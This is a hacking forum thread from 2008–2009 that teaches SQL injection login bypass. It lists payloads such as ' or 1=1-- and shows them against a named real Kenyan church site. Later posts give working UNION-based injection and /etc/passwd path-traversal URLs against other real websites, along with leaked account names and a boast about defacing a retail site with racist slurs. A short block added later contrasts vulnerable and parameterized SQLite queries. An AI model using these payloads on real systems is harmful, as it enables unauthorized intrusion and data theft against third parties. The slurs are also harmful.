sql injections and how to do them
deathlord888
October 14th, 2008, 04:30 PM
sql injections are a joke
all this does is trick the server into running some code in the password field that appears you have the correct password ie 1=1 or a=a
the website then believes you have the right password, instead of comparing the two passwords to see if they are identical it takes the statement 1=1 and since that is true it lets you in
google inurl:index.asp
for possibly vulnerable websites
then to log in try injecting different code
i will use the churches of kenya site as an example
http://www.ncck.org/*****/login.asp?check=false
go to the login
type *****
then in the password field try different sql lines from below
if you get an error message when you enter the line that means the website is vulnerable so keep trying until you get it
here is the list
' or 'a'='a
' or 1=1--
" or 1=1--
" or "a"="a
or 1=1--
') or ('a'='a
have fun
http://img146.imageshack.us/img146/2889/ownedri6.jpg
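Added example, not part of the original post: the login check described above fails because the password is pasted into the SQL text, and binding it as a parameter removes the problem. The in-memory SQLite table, the plaintext password column and the function names `make_db`, `login_concatenated` and `login_parameterized` are assumptions made for illustration; SQLite stands in for whatever database the site used.

```python
import sqlite3

# Constructed sample data: one account in an in-memory database.
# (Plaintext password column is a simplification; real systems store hashes.)
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('alice', 'correct horse')")
    return db

def login_concatenated(db, username, password):
    """Vulnerable pattern: user input is pasted into the SQL text."""
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    try:
        return db.execute(sql).fetchone() is not None
    except sqlite3.OperationalError:
        # Unbalanced quotes or parentheses in the input broke the statement.
        # A SQL syntax error caused by a login field is worth alerting on.
        return False

def login_parameterized(db, username, password):
    """Fixed pattern: input is bound as data and never parsed as SQL."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone() is not None

# Strings taken from the list in the post above.
POSTED_STRINGS = ["' or 'a'='a", "' or 1=1--", "') or ('a'='a"]

def compare(db):
    """Return {string: (concatenated_result, parameterized_result)}."""
    return {s: (login_concatenated(db, "alice", s),
                login_parameterized(db, "alice", s)) for s in POSTED_STRINGS}

if __name__ == "__main__":
    db = make_db()
    for s, (weak, fixed) in compare(db).items():
        print(f"{s!r:20} concatenated={weak} parameterized={fixed}")
    print("real password:", login_parameterized(db, "alice", "correct horse"))
```

With the parameterized query every posted string is compared as a literal password and rejected, while the real password still logs in.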
Exploding_viper
October 14th, 2008, 11:24 PM
lol pwned that site
deathlord888
October 15th, 2008, 03:05 PM
haha ya it is easy
freetibet
October 16th, 2008, 03:39 AM
i've been wanting to know how sql works. if i'd known it was so simple i would have tried it ages ago
I tried it on the churches kenya website but when i tried to go to the forum it said the host was locked.
did you have this problem?
deathlord888
October 16th, 2008, 09:00 AM
no lol maybe they got tired of people doing it lol
i used
hi' or 'a'='a
MISFlT
October 20th, 2008, 07:00 PM
ok um... what?
never tried sql injections... run me thru it?
deathlord888
October 20th, 2008, 10:48 PM
it tricks the server into thinking that the password is correct because the statement you send it is true
ninj4n
November 18th, 2008, 04:53 AM
scriptkiddies >:>
deathlord888
November 18th, 2008, 03:28 PM
how am i a skiddie?
am i using code i do not understand?
am i running programs made by others that i do not understand?
before you flame at least gather some proof
DoG MikkyW
November 19th, 2008, 03:49 PM
I deleted everyone's post with <noembed>...
deathlord888
November 19th, 2008, 03:52 PM
lol why would you do such a thing
DoG MikkyW
November 19th, 2008, 05:15 PM
That was a while ago though...
ponchoman
January 8th, 2009, 07:13 PM
wow probably gonna get flamed for this one...but how do you bring up an administrator's login from the webpage?
ishkur88
January 8th, 2009, 08:37 PM
wow probably gonna get flamed for this one...but how do you bring up an administrator's login from the webpage?
If you have the slightest hint that what you're asking will 'get you flamed', don't ask it, and try to do some problem solving yourself.
Depending on the server software and what website software is running, there could be thousands of ways to get to an "***** login".
ponchoman
January 8th, 2009, 08:46 PM
If you have the slightest hint that what you're asking will 'get you flamed', don't ask it, and try to do some problem solving yourself.
Depending on the server software and what website software is running, there could be thousands of ways to get to an "***** login".
ya i did some searching, i found some javascript injections and some .php add-ons, they dont really work but whatever....
DoG MikkyW
January 8th, 2009, 08:51 PM
What site?
deathlord888
January 8th, 2009, 08:54 PM
odds are they do work.. you are just doing it wrong
ishkur88
January 9th, 2009, 08:20 PM
If you actually look at the figures and do some statistical analysis... odds are you're just an idiot.
Cuddles
January 9th, 2009, 08:49 PM
man...i wrote like a four or five page article about sql injection on here once, this is nothing compared to what you CAN do with sql injection. they're not a joke, and many of the finer aspects of sql injection are nowhere in your definition of them.
deathlord888
January 9th, 2009, 10:55 PM
yes i did not include ANYTHING other than just getting into a password on little vulnerable sites, but see people are having problems with this lol imagine if i posted something above grade 9 level
Dubstep
May 27th, 2009, 02:40 PM
So let me get this straight before i try anything
i just go to login type ***** 5times then in password i type
` OR "1=1' or something close and i will be in ?
ty for the Post Deathlord
Ebe
May 27th, 2009, 04:04 PM
Meh.. You get in IF its vulnerable to it.. Also theres shit load of SQl injection strings available.. Also thats just the simple 1..
DoG MikkyW
May 27th, 2009, 10:35 PM
Dubstep, sql injection isn't just a means of getting in, at its best, it can be used to control whole web servers, changing fields, tables, and recording vital data. If you were to do what you were talking about (' or '1'='1 and others alike), you would be mocked for missing a great chance to record TONS of info. So yeah, cuddles, as he said, wrote a giant SQL injection tutorial once, but it's all gone. Just read up, some really interesting stuff on the topic is all over the place to be found.
Dubstep
May 28th, 2009, 12:13 PM
okie ty for the info :)
merq
July 12th, 2009, 02:02 PM
Check out SQLMap. It's in BT3. The whole ' or 1=1-- is a joke. Most SQL servers are patched up. POST and GET methods are where it's at. JS Injection (aka. XXS) is really useful. Just cookie editing. There are a lot of good Firefox addons that help with XXS. Check out Tamper Data.
DoG MikkyW
July 12th, 2009, 06:32 PM
Check out SQLMap. It's in BT3. The whole ' or 1=1-- is a joke. Most SQL servers are patched up. POST and GET methods are where it's at. JS Injection (aka. XXS) is really useful. Just cookie editing. There are a lot of good Firefox addons that help with XXS. Check out Tamper Data.
Most post and get lines deal with SQL, so it's a good idea to learn basic SQL injection, but also advanced SQL injection. And it's XSS, not XXS.
merq
July 12th, 2009, 06:54 PM
Most post and get lines deal with SQL, so it's a good idea to learn basic SQL injection, but also advanced SQL injection. And it's XSS, not XXS.
Yeah my bad cross site scripting i knew that. The POST and GET is good sql injection for forums and such. For privilege escalation XSS is good.
deathlord888
July 12th, 2009, 06:56 PM
Check out SQLMap. It's in BT3. The whole ' or 1=1-- is a joke. Most SQL servers are patched up. POST and GET methods are where it's at. JS Injection (aka. XXS) is really useful. Just cookie editing. There are a lot of good Firefox addons that help with XXS. Check out Tamper Data.
clearly i did not post this as an advanced guide... but how is it a joke? i showed it working...
merq
July 12th, 2009, 07:06 PM
I'm saying its pretty much useless now.
deathlord888
July 12th, 2009, 10:13 PM
it pretty much still works.
DoG MikkyW
July 13th, 2009, 06:07 PM
You're both right, and wrong. (Depends if you're a glass half empty, glass half full kind of person.) It does still work. And it's sort of useless in the sense that there is so much else that you can do with the usage of SQL injections that it would be wasteful and an outright shame to do a simple ' or 1=1-- on something that is wide open to the more colorful, interesting side of SQL.
merq
July 13th, 2009, 09:10 PM
Yeah i get you. But most people who run web servers know what they are doing. Updates and patches fix all that basic SQL injection. Unless you find some foreign shit. I used to do it to this site called sareeworld.com, which sells these indian robes called sarees and i used to go and change the color names to shit like Nigger Shit Brown, Period Blood Red... shit like that, twas funny.
Xon
July 13th, 2009, 09:15 PM
And that shows how old you are...
merq
July 13th, 2009, 09:24 PM
yeah i get you. But most people who run web servers know what they are doing. Updates and patches fix all that basic sql injection. Unless you find some foreign shit. i used to do it to this site called sareeworld.com, which sells these indian robes called sarees and i used to go and change the color names to shit like nigger shit brown, period blood red... Shit like that, twas funny.
1234567890
deathlord888
July 13th, 2009, 09:31 PM
dont post in my threads fucker
merq
July 13th, 2009, 10:02 PM
dont post in my threads fucker
Dude you just sitting there trying to make fun of my maturity level just got fucked. So now you resort to dont post in my threads fucker
wow.
deathlord888
July 13th, 2009, 10:05 PM
dont post in the threads fucker
merq
July 13th, 2009, 10:07 PM
post post post
Xon
July 13th, 2009, 10:08 PM
what an ass...
merq
July 13th, 2009, 10:10 PM
what an ass...
What a tool. Find some shit that you have to prove my CPU and SQL db access wrong then talk to me.
Xon
July 13th, 2009, 10:11 PM
I did but you ignored me.
deathlord888
July 13th, 2009, 10:14 PM
we have you ignored it. dog could you ban him from posting? he is ruining my shit even tho its not impressive he is annoying the shit out of me
Xon
July 13th, 2009, 10:15 PM
agreed....
merq
July 13th, 2009, 10:16 PM
Your idea of proving me wrong is talking about how hard drives is what's used for h4x0r5. Idiot. YOU'RE WRONG?
deathlord888
July 13th, 2009, 10:18 PM
sigh i never said an HDD was the only thing a computer needs to run, show me where i said that.
Xon
July 13th, 2009, 10:19 PM
actually, no, it wasn't... Nice try though...
merq
July 13th, 2009, 10:21 PM
I was being facetious.
Xon
July 13th, 2009, 10:25 PM
good job spelling there...
deathlord888
July 13th, 2009, 10:25 PM
HAHAHA way to try and cover your ass when you looked like a dumb ass
Xon
July 13th, 2009, 10:26 PM
yup...........
merq
July 13th, 2009, 10:38 PM
lol? I knew you didn't say your hd was the key to hacking. You were just saying shit about you can't program without it. You can't even run a computer without some type of storage because that means no OS. You can program anything if you have an OS but your OS is stored on your hd but the cpu is what runs it.
deathlord888
July 13th, 2009, 10:43 PM
no one is saying a Central PROCESSING Unit doesn't process anything..
merq
July 14th, 2009, 01:53 AM
Yeah it processes everything. And thats what I'm trying to say but your saying all kinds of shit for the sake of contradiction.
Xon
July 14th, 2009, 07:53 AM
go read your thread.... if you actually read it you will realize you are wrong...
ROGERS21
July 16th, 2009, 02:54 AM
ok im not really sure how to do any of this, will it work for any site? or just really vulnerable ones? please send messages showing more detail to me! thanks!
Xon
July 16th, 2009, 09:35 AM
Why don't you actually go study instead of ask people for handouts.
ROGERS21
July 16th, 2009, 01:27 PM
i have tried that but i dont really understand it, its like trying to say study without a textbook?
deathlord888
July 16th, 2009, 02:05 PM
LEARN SQL then come back, i explained it the easiest possible way
Xon
July 16th, 2009, 05:02 PM
Thanks death...
ROGERS21
July 16th, 2009, 10:37 PM
OK! i will do exactly that!!! haha wats a good site to test on?
Xon
July 16th, 2009, 11:18 PM
Make your own.... Too simple
Twisted420
July 17th, 2009, 06:32 PM
Are you fucking kidding me? Why don't you get the fuck lost man. If you can't figure out some simple shit like that, you've got no business attempting SQLi.
But just for the sake of others having an easy SQLi to play with, here you go.
http://www.learnbirdsongs.com/birdsong.php?id=null%20union%20all%20select%201,2, 3,4,5,6,7,8,9--
Now go have some fun, research, and don't ask any more stupid questions.
KTHXBAI
And hell, while I'm bored, here's an LFI (Local File Include ) vulnerability to play with:
http://www.phishows.com/jinzora2/index.php?op=1&name=../../../../../../../../../etc/passwd
Make sure to add a null byte to the end of that url. And don't ask me what a null byte is....
The first person to get that LFI correct, and post the name of the first user account here, will get another SQLi vulnerability as a prize. Yay for them.
ROGERS21
July 18th, 2009, 12:32 AM
its not simple if you dont know it! duh hahaha and i already got it down, now im just practicing and building some basic skill on dif. sites
SuckMyDickFeds
August 10th, 2009, 02:45 AM
daemon is the administrator account
xXN0sferatuXx
October 14th, 2009, 08:36 PM
Majordomo:/usr/lib/majordomo:/bin/false postgres:x:32:32:PostgreSQL administrator